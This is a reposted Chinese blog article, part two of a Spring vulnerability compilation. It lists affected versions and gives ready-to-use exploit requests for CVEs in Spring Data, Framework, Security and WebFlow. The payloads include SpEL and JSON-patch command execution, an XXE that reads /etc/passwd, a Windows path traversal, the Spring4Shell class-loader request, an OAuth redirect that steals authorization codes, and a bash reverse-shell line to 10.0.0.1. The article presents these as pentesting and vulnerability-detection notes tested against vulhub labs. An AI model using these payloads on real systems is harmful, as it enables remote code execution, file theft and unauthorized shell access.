1. Toy模板网首页
  2. > Toy博客

spring漏洞合集 下

8月前 作者:安全小工坊 分类:Toy博客 阅读(46) 违法举报

这篇具有很好参考价值的文章主要介绍了spring漏洞合集 下。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

spring漏洞合集 下

前言

现在的 java 开放的网站十个里面有九个是 spring 写的。网上对 spring 相关漏洞的资料很多,但是总结的文章却很少,再加上 spring 庞大的生态,每当看到 spring 相关网站的时候,脑子里虽然零零散散冒出来一堆漏洞,但是却不知道哪些符合当前环境。

因此搜集了所有 spring 相关漏洞,对它们的利用条件和检测方式进行梳理和总结,希望在面对 spring 的时候,能够有一个更完整的思路去发现漏洞。

这里更多是的是的利用条件和检测方式的总结,主要以发现漏洞为目的,至于如何将漏洞效果最大化这里不做过多介绍,网上资料很多,直接查对应文章即可。

此合集由于内容较多,分为上下两部分。

上半部分内容:

  • Spring Boot Actuator 相关漏洞
  • Sping Boot 相关漏洞
  • Spring Cloud 相关漏洞

下半部分内容:

  • Spring Data 相关漏洞
  • Spring Framework 相关漏洞
  • Spring Security 相关漏洞
  • Spring WebFlow 相关漏洞

上半部分地址: spring漏洞合集 上

Spring Data 漏洞

Spring Data 是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons 是 Spring Data 下所有子项目共享的基础框架

(CVE-2017-8046)Spring Data Rest 远程命令执行漏洞

影响范围

  • PivotalSpringDataREST2.5.12 之前的版本,2.6.7 之前的版本,3.0RC3 之前的版本
  • SpringBoot2.0.0M4 之前版本
  • SpringDataKay-RC3 之前的版本

参考文章

http://www.code2sec.com/cve-2017-8046-spring-data-restming-ling-zhi-xing-lou-dong.html

特征

header 头是 Content-Type: application/hal+json;charset=UTF-8

spring漏洞合集 下

漏洞利用

PATCH http://localhost:18080/customers/1 HTTP/1.1
Host: localhost:18080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 193

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/1", "value": "vulhub" }]

必须是Content-Type: application/json-patch+json

op 是 replace 时,payload 后面必须有路径,不然不能触发 具体内容随意

spring漏洞合集 下

op 是 test 不需要其他路径

spring漏洞合集 下

spring漏洞合集 下

漏洞环境

见 vulhub

(CVE-2018-1259)Spring Data xxe 漏洞

影响范围

  • Spring Data Commons 1.13-1.13.11 (Ingalls SR11)
  • Spring Data REST 2.6-2.6.11 (Ingalls SR11)
  • Spring Data Commons 2.0-2.0.6 (Kay SR6)
  • Spring Data REST 3.0-3.0.6 (Kay SR6)

测试环境

Spring Data xxe 本地环境

漏洞利用

需要对应参数名,如果参数名不存在 则无法触发,比如测试环境参数的是 firstname lastname 只能这两个参数触发,修改为其他的无法触发. 需要被动扫描能够解析 xml 啊

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<user1><firstname>&xxe;</firstname><lastname>test</lastname></user1>

spring漏洞合集 下

参考链接

https://blog.spoock.com/2018/05/16/cve-2018-1259/

(CVE-2018-1273)Spring Data Commons 组件远程代码执行漏洞

影响范围

  • Spring Data Commons 1.13 - 1.13.10(Ingalls SR10)
  • Spring Data REST 2.6 - 2.6.10 (Ingalls SR10)
  • Spring Data Commons 2.0 - 2.0.5 (Kay SR5)
  • Spring Data REST 3.0 - 3.0.5 (Kay SR5)

复现环境

vulhub

漏洞利用

poc

POST /users?page=&size=5 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 124

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

第二种 payload

username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf

spring漏洞合集 下

spring漏洞合集 下

Spring Framework

(CVE-2015-5211)Spring Framework 内容协商机制(content-negotiation)反射型文件下载(RFD)

RFD,即 Reflected File Download 反射型文件下载漏洞,是一个 2014 年来自 BlackHat 的漏洞。这个漏洞在原理上类似 XSS,在危害上类似 DDE:攻击者可以通过一个 URL 地址使用户下载一个恶意文件,从而危害用户的终端 PC。
这个漏洞很罕见,大多数公司会认为它是一个需要结合社工的低危漏洞,但微软,雅虎,eBay,PayPal 和其他许多公司认为这是一个中危漏洞。
RFD 漏洞原理见 https://coolshell.me/articles/rfd-bug-reflect-spring-world.html
简单来说 鸡肋漏洞

影响范围

  • Spring Framework 4.2.0 版本至 4.2.1 版本
  • Spring Framework 4.0.0 版本至 4.1.7 版本
  • Spring Framework 3.2.0 版本至 3.2.14 版本
  • Spring Framework 更早的已不再支持的版本

参考链接

https://xz.aliyun.com/t/8341

(CVE-2020-5398)Spring Framework 反射型文件下载(RFD)

同上

影响范围

  • Spring Framework 5.2.0 – 5.2.2
  • Spring Framework 5.1.0 – 5.1.12
  • Spring Framework 5.0.0 – 5.0.15

(CVE-2020-5421)Spring Framework 反射型文件下载(RFD)

上个漏洞的绕过

影响范围

  • Spring Framework 5.2.0 - 5.2.8、5.1.0
  • Spring Framework 5.1.17、5.0.0
  • Spring Framework 5.0.18、4.3.0
  • Spring Framework 4.3.28 以及更早的不受支持的版本

参考链接

https://xz.aliyun.com/t/8341

(CVE-2018-1271)Spring Framework 目录穿越

依然是一个触发条件很苛刻的漏洞

利用条件

  • 要使用 file 协议打开资源文件目录
  • Windows 平台
  • 不能使用 Tomcat 或者 wildfy 等中间件(本环境演示使用的是 jetty 服务器)

payload

http://127.0.0.1:8080/spring-mvc-showcase/resources/static/..%5c/..%5c/windows/win.ini

参考链接

https://blog.spoock.com/2018/05/30/cve-2018-1271/

(CVE-2022-22965)Spring Framework 命令执行

核弹级漏洞 但是目前公开出来的利用方式就是 tomcat 环境下写 webshell

影响范围

  • Spring Framework < 5.3.18
  • Spring Framework < 5.2.20

漏洞环境

vulhub

漏洞复现

vulhub 提供的是直接写入 webshell 的,由于有些目标在验证时不允许写 webshell,这里做了修改,只是普通的打印一段字符串,用于验证漏洞。

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20out.println(%2211111111%22)%3b%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=22&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
suffix: %>//
c2: <%
DNT: 1
Content-Length: 2

spring漏洞合集 下

ps: 这个漏洞只能发送一次 payload 需要重启环境才能再次写入 原因未知

Spring Messaging

(CVE-2018-1270)Spring Messaging 远程命令执行

影响范围

  • Spring Java Framework < 5.0

漏洞利用

sockjs 通讯 非 http 协议 具体方法见https://github.com/vulhub/vulhub/tree/master/spring/CVE-2018-1270

复现环境

vulhub

Spring Security

(CVE-2016-4977)Spring Security OAuth2 远程命令执行

影响范围

  • Spring Security OAuth 2.0.0 版本至 2.0.9 版本
  • Spring Security OAuth 1.0.0 版本至 1.0.5 版本中

漏洞利用

就是普通的 spel 表达式注入 参数为response_type

复现环境

vulhub

(CVE-2018-1260)Spring Security Oauth2 远程代码执行

影响范围

  • Spring Security OAuth 2.3 to 2.3.2
  • Spring Security OAuth 2.2 to 2.2.1
  • Spring Security OAuth 2.1 to 2.1.1
  • Spring Security OAuth 2.0 to 2.0.14

利用方法

spel 表达式注入 无回显 需要 dnslog 漏洞参数scope

payload: ${T(java.lang.Runtime).getRuntime().exec("calc.exe")}

参考链接

https://blog.spoock.com/2018/05/13/cve-2018-1260/

(CVE-2019-3778)Spring Security OAuth2 开放重定向

影响范围

  • Spring Security OAuth 2.3 to 2.3.4
  • Spring Security OAuth 2.2 to 2.2.3
  • Spring Security OAuth 2.1 to 2.1.3
  • Spring Security OAuth 2.0 to 2.0.16

限制条件

  • 有问题的 Spring Security OAuth2 版本
  • OAuth 认证使用授权码模式
  • 用户需要在登录的情况下

复现环境

漏洞利用

简单来说这个漏洞就是在利用 url 跳转偷认证票据

Blackhat 2019 有一篇文章"Make Redirection Evil Again URL Parser Issues in OAuth"中提到了一种利用方式,通过添加%ff,在服务端解析错误后,会将其变成?,从而达到 url 跳转的目的。

#访问链接
http://localhost:9090/oauth/authorize?response_type=code&client_id=ananaskr&redirect_uri=http://www.xxxx.com%ff@www.baidu.com&scope=all&client_secret=123456

#跳转到http://www.xxxx.com并且在后面追加了认证票据code
http://www.xxxx.com?@www.baidu.com?code=xxxx

参考链接

https://xz.aliyun.com/t/7409

Spring WebFlow

(CVE-2017-4971)Spring WebFlow 远程代码执行

影响范围

Spring WebFlow 2.4.0 - 2.4.4

复现环境

vulhub

复现过程

# 数据包添加一个带漏洞的参数即可
_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/10.0.0.1/21 0>&1")).start()=xxxx

往期文章

  • 对目录扫描工具dirsearch 的一些小改造
  • Oneforall 子域名扫描工具分析与改造
  • Xpocsutie3:基于 pocsuite3 二次修改的 POC 检测框架

spring漏洞合集 下文章来源地址https://www.toymoban.com/news/detail-448169.html

到了这里,关于spring漏洞合集 下的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • ThinkPHP漏洞合集(专注渗透视角)

    ThinkPHP漏洞合集(专注渗透视角)

    对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面

    2024年02月04日
    浏览(106)
  • 全网最全100个AI工具导航网站合集

    全网最全100个AI工具导航网站合集

    随着ChatGPT年前的爆火,人工智能也变成当今最热门的领域之一,它正在改变着我们的生活和工作方式。无论你是想要学习人工智能的基础知识,还是想要利用人工智能来提升你的业务效率和创新能力,都需要找到合适的AI工具来帮助你实现目标。 但是,在海量的AI工具中,如

    2024年02月09日
    浏览(42)
  • 超全人工智能 AI工具导航网站合集

    超全人工智能 AI工具导航网站合集

    作者 :明明如月学长, CSDN 博客专家,蚂蚁集团高级 Java 工程师,《性能优化方法论》作者、《解锁大厂思维:剖析《阿里巴巴Java开发手册》》、《再学经典:《EffectiveJava》独家解析》专栏作者。 热门文章推荐 : (1)《人工智能时代,软件工程师们将会被取代?》 (2)

    2024年02月02日
    浏览(57)

  • Linux系统之部署网页小游戏合集网站

    games项目 Games项目是一个网页小游戏合集的网站,用户可以在浏览器中直接打开并试玩其中的游戏。该网站已经自动安装了一些开源的小游戏,同时也支持定制功能,用户可以根据自己的需求对游戏进行定制。这个项目的目的是为了提供一个方便、快捷并且开放的平台,让用

    2024年02月20日
    浏览(50)
  • 有哪些值得推荐的源码共享网站?最全免费下载源代码网站合集(16个)

    有哪些值得推荐的源码共享网站?最全免费下载源代码网站合集(16个)

    在这篇文章中,我们整理了可免费下载源代码的16大网站:1. Stack Overflow;2.GitHub;3.开源中国 (OSChina);4.CSDN;5.码云 (Gitee);6. CodePen;7. SourceForge;8. OSDN;9. Code My UI;10. CodeGuru;11. FossHub;12. GenerateWP;13. CodeProject;14. F-Droid;15. DevX;16. Google Open Source 你可以从这些网

    2024年02月05日
    浏览(211)
  • 致远OA敏感信息泄露漏洞合集(含批量检测POC)

    致远OA敏感信息泄露漏洞合集(含批量检测POC)

    产品系列: A3、A6、A8 品牌: 用友 对象: 微型、小型企业、企业部门级 漏洞描述 致远OA A8-m 存在状态监控页面信息泄露,攻击者可以从其中获取网站路径和用户名等敏感信息进一步攻击 漏洞影响 致远OA A8-m 网络测绘 title=“A8-m” 漏洞复现 访问监控页面 /seeyon/management/status.jsp 后

    2024年02月02日
    浏览(75)
  • AI绘画网站合集!这6个AI绘画工具超好用!

    AI绘画网站合集!这6个AI绘画工具超好用!

      绘图并非每个人的强项,而且在当下讲究效率的时代,人们需要在短时间内创作出高质量的图片,因此,如何创作出精美有创意的图片,成了经常谈论的话题。 本文为大家介绍6款好用的AI绘图软件,它们不仅可以激发创作灵感,且能让创作效率大大提升! 1.  boardmix 博思白

    2024年02月14日
    浏览(47)

  • 抖音开放平台网站应用:用户未绑定应用白名单,请授权trial.whitelist权限

    升级后的抖音开放平台 2022-12-10日首稿 开通测试权限需要做下面几件事情: 添加 user_info(用户权限栏下)权限 添加 trial.whitelist (特殊权限栏下)权限 在网站应用的设置中,添加了白名单 测试用户同意加入白名单 在抖音开放平台,进入对应的网站应用,打开能力管理-用户

    2023年04月08日
    浏览(39)
  • 网站被攻击如何修复网站漏洞

    网站被攻击如何修复网站漏洞

    如果网站遭到黑客攻击,不要担心,您可以遵循以下提示: 1.确认网站已被篡改攻击,尤其被上传了网站木马文件,一般被称为是Webshell。攻击者也有可能通过Webshell获得服务器的管理员权限,甚至渗透到内部网。因此,您可以通过日志等标志来判断和确认攻击的范围。 2、备份

    2024年02月14日
    浏览(53)
  • 【Spring Boot】专栏合集,快速入门大全

    【Spring Boot】专栏合集,快速入门大全

    作者简介 前言 作者之前写过一个Spring Boot的系列,包含自动装配原理、MVC、安全、监控、集成数据库、集成Redis、日志、定时任务、异步任务等内容,本文将会一文拉通来总结这所有内容,不骗人,一文快速入门Spring Boot。 专栏地址: https://blog.csdn.net/joker_zjn/category_12439661.

    2024年02月07日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包